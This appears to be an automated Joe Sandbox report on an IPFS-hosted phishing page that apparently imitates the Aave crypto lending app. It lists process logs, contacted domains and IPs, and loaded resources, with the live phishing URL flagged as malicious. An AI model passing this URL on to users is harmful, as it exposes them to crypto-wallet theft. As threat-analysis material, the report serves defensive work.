Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1956,i,1385837072014725862,5014382410172538292,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6488 --field-trial-handle=1956,i,1385837072014725862,5014382410172538292,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6456 --field-trial-handle=1956,i,1385837072014725862,5014382410172538292,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1956,i,1385837072014725862,5014382410172538292,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6488 --field-trial-handle=1956,i,1385837072014725862,5014382410172538292,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6456 --field-trial-handle=1956,i,1385837072014725862,5014382410172538292,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/100%SlashNextFraudulent Website type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    unknown
    cname.vercel-dns.com
    76.76.21.142
    truefalse
      unknown
      discord.com
      162.159.135.232
      truefalse
        unknown
        api.thegraph.com
        104.18.40.31
        truefalse
          unknown
          rpc.flashbots.net
          104.22.64.252
          truefalse
            unknown
            eth-mainnet.rpc.grove.city
            34.36.6.252
            truefalse
              unknown
              cdn.discordapp.com
              162.159.133.233
              truefalse
                unknown
                eth-mainnet.public.blastapi.io
                104.22.52.246
                truefalse
                  unknown
                  fp2e7a.wpc.phicdn.net
                  192.229.221.95
                  truefalse
                    unknown
                    bg.microsoft.map.fastly.net
                    199.232.214.172
                    truefalse
                      unknown
                      app.aave.com
                      104.26.2.101
                      truefalse
                        unknown
                        cloudflare-eth.com
                        104.18.10.112
                        truefalse
                          unknown
                          www.cloudflare.com
                          104.16.124.96
                          truefalse
                            unknown
                            bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                            209.94.90.2
                            truefalse
                              unknown
                              remote-auth-gateway.discord.gg
                              162.159.136.234
                              truefalse
                                unknown
                                www.google.com
                                142.250.186.132
                                truefalse
                                  unknown
                                  shark.multi-rpc.com
                                  173.244.207.29
                                  truefalse
                                    unknown
                                    apps.aavechan.com
                                    unknown
                                    unknownfalse
                                      unknown
                                      docs.flashbots.net
                                      unknown
                                      unknownfalse
                                        unknown
                                        rpc.ankr.com
                                        unknown
                                        unknownfalse
                                          unknown
                                          NameMaliciousAntivirus DetectionReputation
                                          https://discord.com/assets/83715ab23647c1be8510.jsfalse
                                            unknown
                                            https://app.aave.com/_next/static/chunks/1573-e710bb2ca0646568.jsfalse
                                              unknown
                                              https://app.aave.com/_next/static/chunks/652.53344261806e4edf.jsfalse
                                                unknown
                                                https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/8882.78d4e9d7872de2c1.jstrue
                                                  unknown
                                                  https://app.aave.com/_next/static/ZcUTDKp_rDmFKouqSkKwt/_buildManifest.jsfalse
                                                    unknown
                                                    https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/9072-51cf922cfdeaf6b4.jstrue
                                                      unknown
                                                      https://app.aave.com/_next/static/chunks/1066.2c0391345744a196.jsfalse
                                                        unknown
                                                        https://discord.com/assets/23a7a3fd6624342117bf.svgfalse
                                                          unknown
                                                          https://app.aave.com/_next/static/chunks/2431.f5a5acbb8bd2a9de.jsfalse
                                                            unknown
                                                            https://app.aave.com/_next/static/media/Inter-Regular.f1f0c35b.woff2false
                                                              unknown
                                                              https://app.aave.com/_next/static/media/Inter-Medium.dc792b50.woff2false
                                                                unknown
                                                                https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/pages/v3-migration-cb3960f54b93b1d0.jstrue
                                                                  unknown
                                                                  https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/qfKi0l7EhUa_QqPERmaKb/_ssgManifest.jstrue
                                                                    unknown
                                                                    https://www.cloudflare.com/application-services/products/web3/false
                                                                      unknown
                                                                      https://app.aave.com/staking/false
                                                                        unknown
                                                                        https://discord.com/assets/ecff74bf4394e6e58dd1.woff2false
                                                                          unknown
                                                                          https://app.aave.com/_next/static/chunks/6211.0162dd216a599ca3.jsfalse
                                                                            unknown
                                                                            https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/icons/flags/fr.svgtrue
                                                                              unknown
                                                                              https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/media/Inter-Medium.dc792b50.woff2true
                                                                                unknown
                                                                                https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/media/Inter-SemiBold.fcb100c7.woff2true
                                                                                  unknown
                                                                                  https://discord.com/assets/6932d272acd867e3b6e3.jsfalse
                                                                                    unknown
                                                                                    https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/501.32a1d2d2411733f6.jstrue
                                                                                      unknown
                                                                                      https://app.aave.com/_next/static/chunks/425.092c8e24fce5a024.jsfalse
                                                                                        unknown
                                                                                        https://discord.com/assets/b595a2694f43514497d1.jsfalse
                                                                                          unknown
                                                                                          https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/aaveLogo.svgtrue
                                                                                            unknown
                                                                                            https://discord.com/assets/24a0aa8d37ef3037705f.cssfalse
                                                                                              unknown
                                                                                              https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/1320.f9a83bb87b7294af.jstrue
                                                                                                unknown
                                                                                                https://app.aave.com/_next/static/chunks/6806.18ebffe630a5cedb.jsfalse
                                                                                                  unknown
                                                                                                  https://rpc.ankr.com/ethfalse
                                                                                                    unknown
                                                                                                    https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/1497.8e36954048946218.jstrue
                                                                                                      unknown
                                                                                                      https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/main-37e08f82b0681cde.jstrue
                                                                                                        unknown
                                                                                                        https://app.aave.com/_next/static/chunks/4254-a9fee39d0c27297f.jsfalse
                                                                                                          unknown
                                                                                                          https://app.aave.com/icons/networks/zksync.svgfalse
                                                                                                            unknown
                                                                                                            https://app.aave.com/_next/static/chunks/8806.676baa0645cae697.jsfalse
                                                                                                              unknown
                                                                                                              https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/5599-221be466b9fcb06f.jstrue
                                                                                                                unknown
                                                                                                                https://discord.com/assets/bfcdec9c24c821355547.jsfalse
                                                                                                                  unknown
                                                                                                                  https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/pages/governance-0757370cd87e1b88.jstrue
                                                                                                                    unknown
                                                                                                                    https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/7978-570f194bf991f35f.jstrue
                                                                                                                      unknown
                                                                                                                      https://app.aave.com/_next/static/chunks/pages/_app-59c4c0609aba862f.jsfalse
                                                                                                                        unknown
                                                                                                                        https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/1102-a299e0e4a621aea1.jstrue
                                                                                                                          unknown
                                                                                                                          https://app.aave.com/icons/flags/en.svgfalse
                                                                                                                            unknown
                                                                                                                            https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/8977.8cefff53c53bdda4.jstrue
                                                                                                                              unknown
                                                                                                                              https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/82-c4138125c2feb6d3.jstrue
                                                                                                                                unknown
                                                                                                                                https://discord.com/assets/8234e0a75aa9afb205bd.woff2false
                                                                                                                                  unknown
                                                                                                                                  https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/icons/flags/es.svgtrue
                                                                                                                                    unknown
                                                                                                                                    https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/framework-79bce4a3a540b080.jstrue
                                                                                                                                      unknown
                                                                                                                                      https://app.aave.com/_next/static/css/0da2d62e1a58e826.cssfalse
                                                                                                                                        unknown
                                                                                                                                        https://app.aave.com/_next/static/chunks/main-37e08f82b0681cde.jsfalse
                                                                                                                                          unknown
                                                                                                                                          https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/media/Inter-ExtraBold.d65f0281.woff2true
                                                                                                                                            unknown
                                                                                                                                            https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/true
                                                                                                                                              unknown
                                                                                                                                              https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/icons/flags/el.svgtrue
                                                                                                                                                unknown
                                                                                                                                                https://app.aave.com/_next/static/chunks/82-c4138125c2feb6d3.jsfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/aave.svgtrue
                                                                                                                                                    unknown
                                                                                                                                                    https://app.aave.com/_next/static/chunks/29107295.4a69275373f23f88.jsfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/media/Inter-Bold.579e0f95.woff2true
                                                                                                                                                        unknown
                                                                                                                                                        https://discord.com/assets/e09e89ad935c5efae445.jsfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/icons/tokens/gho.svgtrue
                                                                                                                                                            unknown
                                                                                                                                                            https://discord.com/assets/f93d6452fe5ed4c7077a.jsfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/8806.6223602df2ea965f.jstrue
                                                                                                                                                                unknown
                                                                                                                                                                https://discord.com/assets/afd372d42c991d346d6b.jsfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://rpc.flashbots.net/false
                                                                                                                                                                    unknown
                                                                                                                                                                    https://discord.com/assets/2917679ca8a08c390036.cssfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/9388.ff9a5272b437e6f3.jstrue
                                                                                                                                                                        unknown
                                                                                                                                                                        https://app.aave.com/_next/static/chunks/framework-79bce4a3a540b080.jsfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/staking/true
                                                                                                                                                                            unknown
                                                                                                                                                                            https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/pages/markets-7557748c63adf50d.jstrue
                                                                                                                                                                              unknown
                                                                                                                                                                              https://discord.com/assets/a6f6204cd40c3c5f5c14.jsfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/icons/networks/ethereum.svgtrue
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://cdn.discordapp.com/splashes/602826299974877205/26d834daa945e775d8af2935a04f83e7.jpg?size=1280false
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://app.aave.com/_next/static/chunks/pages/index-92ce489f6f7c51ed.jsfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://app.aave.com/_next/static/chunks/4822.4432b8c54d409362.jsfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/503.5217c75933b76bbc.jstrue
                                                                                                                                                                                          unknown
                                                                                                                                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                          https://discord.com/invite/aave?locale=en-GBchromecache_704.2.drtrue
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://twitter.com/discord).chromecache_331.2.dr, chromecache_420.2.drfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://discord.com/invite/aave?locale=kochromecache_704.2.drtrue
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://discord.com/chromecache_331.2.dr, chromecache_420.2.drfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://cf-assets.www.cloudflare.com/slt3lc6tev37/33wforxIaRsKYbxl1fnBpc/9a649de7c9f96154cbb747ddd6echromecache_528.2.drfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://discord.com/invite/aave?locale=itchromecache_704.2.drtrue
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://etherscan.io/chromecache_454.2.drfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://discord.com/invite/aave?locale=jachromecache_704.2.drtrue
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://support.discord.com/hc/en-us/articles/4410339366295-Paid-Services-Terms).chromecache_331.2.dr, chromecache_420.2.drfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://discord.comchromecache_704.2.drfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://discord.com/invite/aave?locale=es-419chromecache_704.2.drtrue
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://discord.com/invite/aave?locale=huchromecache_704.2.drtrue
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://discord.com/invite/aave?locale=hrchromecache_704.2.drtrue
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://cf-assets.www.cloudflare.com/slt3lc6tev37/4vIlSpn8aLMYdbNLf2QAVk/606bbdcf8faabd23ee7e2db7b63chromecache_528.2.drfalse
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      https://cf-assets.www.cloudflare.com/slt3lc6tev37/Snx91INj9zhp6XXrKWttd/782b0f54013c68f613fc779daf8cchromecache_528.2.drfalse
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        https://discord.com/invite/aave?locale=zh-CNchromecache_704.2.drtrue
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://discord.com/invite/aave?locale=idchromecache_704.2.drtrue
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://discord.com/invite/aave?locale=zh-TWchromecache_704.2.drtrue
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://cf-assets.www.cloudflare.com/slt3lc6tev37/6JreowuAuIySxXXXqycY4r/746dc87c57caa9f58423af84de3chromecache_528.2.drfalse
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://discord.com/invite/aave?locale=hichromecache_704.2.drtrue
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://docs.alchemy.com/reference/eth-sendrawtransactionchromecache_454.2.drfalse
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://discord.com/invite/aave?locale=hechromecache_704.2.drtrue
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      http://discord.gg/fortnite).chromecache_331.2.dr, chromecache_420.2.drfalse
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        https://discord.com/invite/aave?locale=frchromecache_704.2.drtrue
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          https://cf-assets.www.cloudflare.com/slt3lc6tev37/7d6osoCNmGCSGI1ZNFevBM/5cc846701cd4c5d54abcbef2346chromecache_528.2.drfalse
                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                            https://dash.cloudflare.com/sign-upchromecache_528.2.drfalse
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              https://discord.com/invite/aave?locale=vichromecache_704.2.drtrue
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                https://github.com/flashbots/flashbots-docs/edit/main/docs/flashbots-protect/quick-start.mdxchromecache_454.2.drfalse
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                  162.159.128.233
                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                  104.22.64.252
                                                                                                                                                                                                                                                  rpc.flashbots.netUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                  162.159.135.232
                                                                                                                                                                                                                                                  discord.comUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                  104.22.52.246
                                                                                                                                                                                                                                                  eth-mainnet.public.blastapi.ioUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                  209.94.90.3
                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                  40680PROTOCOLUSfalse
                                                                                                                                                                                                                                                  142.250.186.132
                                                                                                                                                                                                                                                  www.google.comUnited States
                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                  173.244.207.29
                                                                                                                                                                                                                                                  shark.multi-rpc.comUnited States
                                                                                                                                                                                                                                                  13213UK2NET-ASGBfalse
                                                                                                                                                                                                                                                  35.190.80.1
                                                                                                                                                                                                                                                  a.nel.cloudflare.comUnited States
                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                  104.26.2.101
                                                                                                                                                                                                                                                  app.aave.comUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                  209.94.90.2
                                                                                                                                                                                                                                                  bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkUnited States
                                                                                                                                                                                                                                                  40680PROTOCOLUSfalse
                                                                                                                                                                                                                                                  104.16.124.96
                                                                                                                                                                                                                                                  www.cloudflare.comUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                  104.18.40.31
                                                                                                                                                                                                                                                  api.thegraph.comUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                  76.76.21.142
                                                                                                                                                                                                                                                  cname.vercel-dns.comUnited States
                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                  76.76.21.241
                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                  76.76.21.164
                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                  104.18.10.112
                                                                                                                                                                                                                                                  cloudflare-eth.comUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                  162.159.133.233
                                                                                                                                                                                                                                                  cdn.discordapp.comUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                  239.255.255.250
                                                                                                                                                                                                                                                  unknownReserved
                                                                                                                                                                                                                                                  unknownunknownfalse
                                                                                                                                                                                                                                                  172.67.36.8
                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                  34.36.6.252
                                                                                                                                                                                                                                                  eth-mainnet.rpc.grove.cityUnited States
                                                                                                                                                                                                                                                  2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                                                                  IP
                                                                                                                                                                                                                                                  192.168.2.4
                                                                                                                                                                                                                                                  192.168.2.5
                                                                                                                                                                                                                                                  127.0.0.1
                                                                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                  Analysis ID:1521219
                                                                                                                                                                                                                                                  Start date and time:2024-09-28 06:10:39 +02:00
